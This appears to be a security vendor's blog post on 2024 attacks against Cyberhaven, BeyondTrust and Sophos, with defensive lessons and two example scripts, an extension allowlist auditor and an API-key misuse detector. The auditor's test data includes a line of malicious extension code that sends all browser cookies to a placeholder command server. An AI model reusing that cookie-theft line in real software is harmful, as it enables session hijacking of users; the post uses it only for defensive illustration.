The Rise of Cybersecurity Companies as Targets [Lessons from 2024]

Why are attackers increasingly focused on exploiting cybersecurity companies as a means to infiltrate ecosystems? Our CISO Todd Carroll explores this new shift in tactics.

When we examine the reality of this trend, there are several lessons to take away. The cases of Cyberhaven, BeyondTrust, and Sophos exemplify this evolution: they show which weaknesses were exploited, why security vendors in particular were singled out, and what defenders can learn from each incident.

Lessons from Cyberhaven: The risk of browser extensions

In December 2024, Cyberhaven, a company known for its data loss prevention (DLP) solutions, became the center of a high-profile attack. Threat actors phished an employee into authorizing a malicious OAuth application, which gave them access to the company's Chrome Web Store developer account. With that access they published a version of Cyberhaven's legitimate extension with malicious code injected, enabling the theft of browser cookies and authentication tokens from over 600,000 users.

Cyberhaven's confirmation of the attack, which was carried out on December 24th.

This attack highlighted the risks associated with third-party browser extensions. By targeting a company deeply embedded in data security, the attackers gained a channel into every browser running the extension, and the cookies and tokens they collected could be used to compromise entire corporate environments. What are the main things we can take away from this incident?
Here is a short list:

  • The need for robust security practices around third-party tools, including pinning the versions you have reviewed rather than accepting silent auto-updates
  • The need for frequent audits of the permissions each extension requests
  • Understanding how critical multi-factor authentication (MFA) is for developer accounts, with one caveat: this attack obtained an OAuth grant rather than a password, so MFA alone would not have stopped it, and you also need to restrict which third-party applications can be authorized against developer and publishing accounts
  • The need for rigorous monitoring for unusual activity, such as a new version published outside the normal release process
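One way to put the first two lessons into practice is to audit every extension you allow against an allowlist that pins the version and package hash reviewed out of band, so that a silently pushed update carrying new permissions or new code is caught before it reaches users. The script below is an added example written for this article, not Cyberhaven's code and not the malicious extension; the extension ID, manifests, file contents and permission weights are constructed for illustration.

```python
"""Audit a browser extension against a pinned allowlist.

Added example for this article, not Cyberhaven's code.  The extension ID,
manifests, file contents and permission weights below are constructed.
"""
import hashlib
import json

# Permissions most useful for session theft, with assumed impact weights.
RISKY_PERMISSIONS = {
    "cookies": 3, "debugger": 3, "nativeMessaging": 3,
    "webRequest": 2, "scripting": 2, "history": 2, "clipboardRead": 2,
    "tabs": 1,
}
# Host patterns that grant access to every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def package_hash(files):
    """Stable SHA-256 over a {path: bytes} package, independent of dict order."""
    h = hashlib.sha256()
    for path in sorted(files):
        h.update(path.encode("utf-8") + b"\0" + files[path] + b"\0")
    return h.hexdigest()


def audit_extension(ext_id, manifest, files, approved):
    """Return {'verdict': 'allow' | 'review' | 'block', ...} for one extension."""
    findings = []
    perms = set(manifest.get("permissions", []))
    # MV2 lists host patterns under "permissions", MV3 under "host_permissions".
    hosts = set(manifest.get("host_permissions", [])) | {
        p for p in perms if p in BROAD_HOSTS or "://" in p
    }
    score = sum(RISKY_PERMISSIONS.get(p, 0) for p in perms)
    if hosts & BROAD_HOSTS:
        score += 3
        findings.append("host access to every site")
        if "cookies" in perms:
            findings.append("cookies + all sites: can read session cookies for any origin")

    pinned = approved.get(ext_id)
    if pinned is None:
        findings.append("extension not on allowlist")
        return {"id": ext_id, "risk_score": score, "findings": findings, "verdict": "block"}

    drift = []
    if manifest.get("version") != pinned["version"]:
        drift.append(f"version {manifest.get('version')} differs from pinned {pinned['version']}")
    if package_hash(files) != pinned["sha256"]:
        drift.append("package hash differs from pinned hash")
    findings.extend(drift)
    # Any change to a pinned package is blocked until it has been reviewed again;
    # an unchanged but powerful extension is surfaced for review rather than blocked.
    verdict = "block" if drift else ("review" if score >= 5 else "allow")
    return {"id": ext_id, "risk_score": score, "findings": findings, "verdict": verdict}


# --- constructed sample data (not a real extension) ---------------------------
EXT_ID = "aaaabbbbccccddddeeeeffffgggghhhh"  # 32-character store ID format, made up
GOOD_MANIFEST = {
    "name": "Example DLP Agent", "version": "1.4.2", "manifest_version": 3,
    "permissions": ["storage", "tabs"],
    "host_permissions": ["https://dlp.example.com/*"],
}
GOOD_FILES = {
    "manifest.json": json.dumps(GOOD_MANIFEST, sort_keys=True).encode(),
    "background.js": b"chrome.runtime.onInstalled.addListener(() => {});\n",
}
# The attacker-pushed update: new permissions plus exfiltration code in the worker.
BAD_MANIFEST = {
    **GOOD_MANIFEST, "version": "1.4.3",
    "permissions": ["storage", "tabs", "cookies"],
    "host_permissions": ["<all_urls>"],
}
BAD_FILES = {
    "manifest.json": json.dumps(BAD_MANIFEST, sort_keys=True).encode(),
    "background.js": GOOD_FILES["background.js"]
    + b"chrome.cookies.getAll({}, c => fetch('https://c2.example/', "
    + b"{method: 'POST', body: JSON.stringify(c)}));\n",
}
# The pin comes from an out-of-band review record, never from the store itself.
APPROVED = {EXT_ID: {"version": "1.4.2", "sha256": package_hash(GOOD_FILES)}}

if __name__ == "__main__":
    for manifest, files in ((GOOD_MANIFEST, GOOD_FILES), (BAD_MANIFEST, BAD_FILES)):
        print(json.dumps(audit_extension(EXT_ID, manifest, files, APPROVED), indent=2))
```

The reviewed 1.4.2 package is allowed, while the 1.4.3 update is blocked on two independent grounds, version drift and a package hash mismatch, before its new `cookies` plus `<all_urls>` combination is even scored. Blocking on any drift is deliberate: the whole point of the Cyberhaven incident is that the malicious build arrived through the normal update channel of a trusted publisher.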

Lessons from BeyondTrust: The exploitation of privileged access management

BeyondTrust, a U.S.-based leader in privileged access management (PAM), publicly disclosed in December 2024 that it had been targeted. Attackers obtained a Remote Support SaaS API key and used it to reset passwords on local application accounts, giving them a foothold in BeyondTrust's cloud infrastructure from which to move laterally. The investigation also surfaced CVE-2024-12356, a critical command injection vulnerability affecting BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products. The breach was damaging because it targeted privileged credentials, which are the keys to critical systems.

The attackers used the compromised vendor solution to reach sensitive client environments. This case underlines the importance of hardening PAM deployments against both insider threats and external attackers, and of treating vendor-held secrets such as API keys as privileged credentials in their own right.

Here are some best practices to take away from this incident: 

  • Implement zero-trust frameworks 
  • Ensure continuous behavior monitoring
  • Ensure that PAM tools are isolated from internet-facing systems, and treat vendor API keys as privileged credentials: scope them narrowly, rotate them, and alert when one is used from an unfamiliar source.
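The behavior-monitoring item above is concrete enough to code. An API key is a privileged credential, so a key that starts authenticating from an address it has never used before, and then resets local accounts within minutes, should page someone. The detector below is an added example written for this article, not BeyondTrust's own logging or detection logic; the JSON-lines schema, the log entries and the baseline of known source addresses are all constructed for illustration.

```python
"""Flag an API key used from an unfamiliar source and then used to reset
privileged accounts.

Added example for this article; the JSON-lines schema, the log below and the
baseline are constructed, not any vendor's real audit format.
"""
import json
from datetime import datetime, timedelta

# Constructed audit log: two service API keys, one of which starts
# authenticating from an address never seen before and immediately resets
# local accounts.
SAMPLE_LOG = """\
{"ts": "2025-01-15T08:00:00Z", "event": "api_auth", "key_id": "k-42", "src_ip": "10.1.5.20"}
{"ts": "2025-01-15T09:00:00Z", "event": "api_auth", "key_id": "k-42", "src_ip": "10.1.5.21"}
{"ts": "2025-01-15T09:02:00Z", "event": "api_auth", "key_id": "k-7", "src_ip": "10.1.5.30"}
{"ts": "2025-01-15T21:13:00Z", "event": "api_auth", "key_id": "k-42", "src_ip": "203.0.113.77"}
{"ts": "2025-01-15T21:14:30Z", "event": "password_reset", "key_id": "k-42", "src_ip": "203.0.113.77", "target": "local-admin"}
{"ts": "2025-01-15T21:15:10Z", "event": "password_reset", "key_id": "k-42", "src_ip": "203.0.113.77", "target": "svc-support"}
{"ts": "2025-01-16T08:01:00Z", "event": "password_reset", "key_id": "k-7", "src_ip": "10.1.5.30", "target": "helpdesk-user"}
"""

# Addresses each key legitimately authenticated from during a prior learning
# window (constructed).  In production this baseline is built from history.
BASELINE = {"k-42": {"10.1.5.20", "10.1.5.21"}, "k-7": {"10.1.5.30"}}
WINDOW = timedelta(minutes=15)


def parse_log(text):
    """Parse JSON lines into event dicts with aware datetimes, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        event["ts"] = datetime.fromisoformat(event["ts"].replace("Z", "+00:00"))
        events.append(event)
    return sorted(events, key=lambda e: e["ts"])


def detect(events, baseline, window=WINDOW):
    """Return alerts: 'medium' for a key seen from a new address, 'high' for a
    privileged reset either from a new address or within `window` of one."""
    alerts = []
    suspect_since = {}  # key_id -> first auth time from an out-of-baseline address
    for e in events:
        key, ip = e["key_id"], e["src_ip"]
        known = baseline.get(key, set())
        if e["event"] == "api_auth":
            if ip not in known:
                suspect_since.setdefault(key, e["ts"])
                alerts.append({"severity": "medium", "rule": "api_key_new_source",
                               "key_id": key, "src_ip": ip, "ts": e["ts"].isoformat()})
        elif e["event"] == "password_reset":
            t0 = suspect_since.get(key)
            recent_new_source = t0 is not None and e["ts"] - t0 <= window
            if recent_new_source or ip not in known:
                alerts.append({"severity": "high", "rule": "privileged_reset_from_suspect_key",
                               "key_id": key, "src_ip": ip, "target": e["target"],
                               "ts": e["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG), BASELINE):
        print(json.dumps(alert))
```

Run against the sample, the detector raises one medium alert when `k-42` first appears from 203.0.113.77 and two high alerts for the resets of `local-admin` and `svc-support` that follow; the routine reset by `k-7` from its usual address stays quiet. The window matters: a reset that comes long after the unfamiliar login, and from a known address, is not escalated on its own, which keeps the rule from paging on every source change a legitimate operator makes.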

Lessons from Sophos: Why firewall exploitation can be so dangerous

The final use case involves UK cybersecurity firm Sophos. They were engaged in a complex battle with Chinese hackers targeting their firewall products, in a case dubbed a “five-year long cyber knife fight with Chinese APTs.”

Sophos confirmed on its blog that their attackers had links to APT groups, including APT41 and APT31.

These attackers, whose activity overlapped with APT41/Winnti, APT31 and Volt Typhoon, exploited vulnerabilities in Sophos' perimeter devices to infiltrate high-profile targets, including military facilities and government agencies. Sophos tracked the activity, identified the operators' TTPs and traced it back to a network of researchers associated with the University of Electronic Science and Technology of China and Sichuan Silence Information Technology.

The company released a detailed report on its own and the wider industry's struggles with vulnerabilities in perimeter devices.

Sophos shared some tips to avoid the same risks. Some of these include:

  • Closely follow your vendor’s device hardening guide to reduce your attack surface and limit exploitability of zero-day vulnerabilities, paying particular attention to administrative interfaces.
  • Enable hotfixes, if supported, and implement processes to monitor your vendors' communications.
  • Ensure you are running supported hardware and software for which your vendor is committed to releasing security updates

Why were cybersecurity companies prime targets last year?

The short answer is, of course, high-value data, but three factors combine:

  1. High-value data: Cybersecurity companies more often than not hold very sensitive client data, which makes them lucrative targets for cybercriminals who can extort or resell it.
  2. Trust exploitation: Compromising a trusted security provider multiplies the impact, because attackers can use the vendor's privileged position (software updates, remote access, API keys) to reach its downstream clients.
  3. The growing sophistication of threat actors: Nation-state actors and advanced persistent threats (APTs) are increasingly targeting cybersecurity firms to gain strategic advantages.

Wrapping up: How to reduce risk in 2025 for you and your SOC team

The attacks on Cyberhaven, BeyondTrust, and Sophos last year show how vulnerable even cybersecurity companies can become without the correct defensive strategy in place. Key recommendations include:

  1. Proactive threat intelligence is crucial: Share and act on threat intelligence in real time; this is not the time to sit on issues. 2024 saw a new level of sophistication in threats that will likely develop further this year.
  2. Zero-trust architectures should be on your checklist: Adopt zero-trust principles to limit the blast radius of a breach. The cases above show just how essential they are.
  3. Enhanced developer security is more important than ever in 2025: Require MFA, restrict which third-party OAuth applications can be granted access to developer and publishing accounts, sign releases, and monitor those accounts continuously. Apply this across all development environments.
  4. Supply chain resilience is topical for a reason: Conduct thorough risk assessments of third-party vendors, pin the versions and integrity hashes of the tools you deploy, and enforce stringent security controls for integrations.

The lessons of 2024, from browser extension compromises to supply chain attacks, are a call to rethink your strategy. You will need to heighten your defenses in the face of this level of attacker sophistication.

CybelAngel’s approach is proactive at heart. Our EASM solution enables you to identify and address potential security threats before they can be exploited. Your dedicated analyst makes sure that you receive qualified intel to remediate fast. If you want to find out more, get in touch with our expert team.